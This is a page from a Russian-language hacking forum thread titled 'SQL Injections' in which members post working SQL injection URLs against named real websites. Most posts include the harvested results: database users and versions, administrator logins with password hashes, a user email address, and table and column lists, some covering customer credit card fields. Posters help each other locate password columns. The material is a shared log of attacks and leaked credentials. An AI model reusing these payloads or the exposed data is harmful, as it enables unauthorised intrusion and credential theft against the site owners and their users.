HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 392 из 1602 « Первая < 292342382 388 389 390 391 392 393 394 395 396 4024424928921392 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.12.2007, 23:05
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию
Код:
http://www.sthscareers.com/news.php?id=-76+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),5,6,7,8,9,10,11,12,13,14,15/*
root@localhost::sths_hr1::4.1.10a


Код:
http://www.americanfibersystems.com/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9,10,11,12/*
afsnetworks2@localhost::afs_site::4.1.20
Код:
http://www.americanfibersystems.com/news.php?id=-71+union+select+1,2,concat_ws(char(58,58),username,passwd),4,5,6,7,8,9,10,11,12+from+users/*
admin::b6983419181946ae88210bf45a998e5b
abrache@afsnetworks.com::6b340fa679eca67086d97ddbf b9894c3::majerle
 
Ответить с цитированием

  #2  
Старый 07.12.2007, 23:14
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
По умолчанию
Код:
http://www.nfb.ca/about/news.php?id=-1585+union+select+1,version(),3,concat_ws(0x2F,login,pass),5,6,7,8,9,10,11,12,13,14+from+user/*
Version: 5.0.37-log/webadmin@localhost/texte

Admins:
Login Password

florence / *C6E74EDED542939C3FF2F2277CD9EDD14719455A
ryan /*8DC81F46F004E99DD2347305BF897C973FD50956
 
Ответить с цитированием

  #3  
Старый 09.12.2007, 10:33
4Dfx
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052

Репутация: 30
По умолчанию
Это мой первый пост так что не судите строго, если что то не так =)

http://www.ugkr.ru/news.asp?id=-842+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19.20,21,22,23--
http://www.ugkr.ru/news.asp?id=-842%20union%20select%201,2,table_name,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19.20,21,22,23%20from%2 0information_schema.tables%20where%20table_name%20 not%20in%20('ABITUR','BIBLIOTEKA')--

Нужная табличка USRGENERAL, а вот список столбцов в ней:
FIRSTLOGON
ID
KEYKOD
KOD_1S
NAME1
NAME2
NAME3
PASKEY
PASSWORD
USER_BIRTH
USER_GENDER
USER_INN
USER_MAIL
USER_PROXCART
USER_RIGHT
USER_SPEC
USER_STUD_STAT_PERIOD
USER_STUD_STATUS
USER_TYPE
USER_UCHGROUP
USER_UDOST
USER_UDOST_DATE
USER_UDOST_NOMER
USER_UDOST_SERIAL
Последний раз редактировалось 4Dfx; 09.12.2007 в 15:23..
 
Ответить с цитированием

  #4  
Старый 08.12.2007, 02:40
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
мозгоёбство:
Цитата:
http://www.batiweb.com/produits/search/rub.asp?type=elements-non-porteurs-verticaux&niv=
1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+
NOT+IN+('dtproperties','annuaire','AWARDS','AWARDS _REF_THEMATIQUES','AWARDS_TRACKING','AWARDS
_VOTE','flash_produit','indus_rub','LOGO_INDUSTRIE LS','LOGO_STATS','LOGOS_TOP','marq_rub','marque','
minisite','PARTNERS','PARTNERS_STATS','prio_marque ','rubrique','RUBRIQUE_TEXTES','sponsorise','stats _url'
,'sysconstraints','syssegments','TEST_URL'))--
стока парица, и нет ничё нормального.

Код:
http://www.filmdeculte.com/film/film.php?id=-1978+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+film/*
4-ая ветка =\
Последний раз редактировалось BlackCats; 08.12.2007 в 04:01..
 
Ответить с цитированием

  #5  
Старый 09.12.2007, 00:06
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию
Код:
http://www.exploresouthbend.org/news.php?id=-96+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),4,5/*
tony@seopro.com::livethelegends::4.1.10a-log

Код:
http://www.gemeindebund.at/news.php?id=-334+union+select+1,2,3,4,5,concat_ws(char(58,58),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
gemeinde@localhost.localdomain::cad_gemeindebund:: 4.0.24-standard
 
Ответить с цитированием

  #6  
Старый 09.12.2007, 02:16
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию
Код:
http://www.tweak.dk/nyheder2.php?id=-15246+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users/*
Код:
http://www.salesafter.de/index.php?id=-30+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13/*
Последний раз редактировалось SWAT; 09.12.2007 в 02:29..
 
Ответить с цитированием

  #7  
Старый 09.12.2007, 14:22
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
Цитата:
http://www.denicek.altre.cz/coment.php?autors=0&id=78221+UNION+SELECT+1,2,conc at_ws(name,0x3a,username,0x3a,icq,0x3,email),4,5,6 ,7+from+users/*
не добил - поле пароля ни как не подберу ..
http://www.denicek.altre.cz/admin
 
Ответить с цитированием

  #8  
Старый 09.12.2007, 14:30
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию
Цитата:
Сообщение от 159932  
не добил - поле пароля ни как не подберу ..
pw
 
Ответить с цитированием

  #9  
Старый 09.12.2007, 15:16
tappakah
Новичок
Регистрация: 26.11.2007
Сообщений: 6
Провел на форуме:
84364

Репутация: 4
По умолчанию
http://www.funisland.com/gamelist.php?id=-13+UNION+SELECT+1,password,username,4,5,6,7,8,9,10 ,11,12,13,14,15+from+admin/*
 
Ответить с цитированием

  #10  
Старый 09.12.2007, 16:36
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734

Репутация: 14
По умолчанию
Код:
http://www.recado.ru/index.php?id=9999+union+select+1,2,concat(user,0x3a,pass)+from+users+limit+0,1/*
Код:
http://www.shemaroo.com/online/product.asp?productid=2279'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('ContestResults','Countries','Currency','DetailPoll','Download','download_logins','DownloadDetails','Film','HomeImages','Login','dtproperties','MblCon','MISDNRange','Order_Details','Order_Master','Order_DetailsIntl','Order_MasterIntl'))--&sent=1
Tables: 'ContestResults','Countries','Currency','DetailPol l','Download','download_logins','DownloadDetails', 'Film','HomeImages','Login','dtproperties','MblCon ','MISDNRange','Order_Details','Order_Master','Ord er_DetailsIntl','Order_MasterIntl

Columns из "Login":
'KeyID','LastLogDate','LoginId','PassAns','PassQue s','Password','Status'

Код:
http://musical-shop.de/details.asp?Artikelnr=10301'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Pages_MusicalShop','sysconstraints','syssegments','Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel_BACKUP','Tab_Musicalnews','Tab_MusicalHistory','Tab_MusicalPremieren','Tab_Musicals','Tab_Musicaltickets','Tab_Playbacks','Tab_Premieren','Tab_Soundclips','Tab_Soundtracks'))--
Tables: Pages_MusicalShop','sysconstraints','syssegments', 'Bewertungen','D99_Tmp','Tab_Artikel','Tab_Artikel _BACKUP','Tab_Musicalnews','Tab_MusicalHistory','T ab_MusicalPremieren','Tab_Musicals','Tab_Musicalti ckets','Tab_Playbacks','Tab_Premieren','Tab_Soundc lips','Tab_Soundtracks','Werbebanner'

Код:
http://www.dvd-shop.ch/result.php?menuid=2'+union+select+1,21,3,table_name+from+information_schema.tables+where+table_name+not+in+('CHARACTER_SETS','COLLATIONS','COLLATION_CHARACTER_SET_APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS')/*
Код:
http://www.artrainusa.org/artwork.asp?item=(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Sales'%20and%20column_name%20not%20in%20('CustID','OrderID','BName','BCompany','BAddress','BCity','BState','BZip','BCountry','Name','Company','Address','City','State','Zip','Country','Phone','Email','Details','SubTotal','Tax','Shipping','ShippingType','GrandTotal','CC','CCNo','CCExp','DatePosted','isDonation','anonymous','mailinglist','contact_preference','contact_idea'))--
Tables:
'News','Calendar','Catalog','dtproperties','Featur es','Sales','sysconstraints'

Columns из 'Sales':
'CustID','OrderID','BName','BCompany','BAddress',' BCity','BState','BZip','BCountry','Name','Company' ,'Address','City','State','Zip','Country','Phone', 'Email','Details','SubTotal','Tax','Shipping','Shi ppingType','GrandTotal','CC','CCNo','CCExp','DateP osted','isDonation','anonymous','mailinglist','con tact_preference','contact_idea'
 
Ответить с цитированием
Ответ
Страница 392 из 1602 « Первая < 292342382 388 389 390 391 392 393 394 395 396 4024424928921392 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.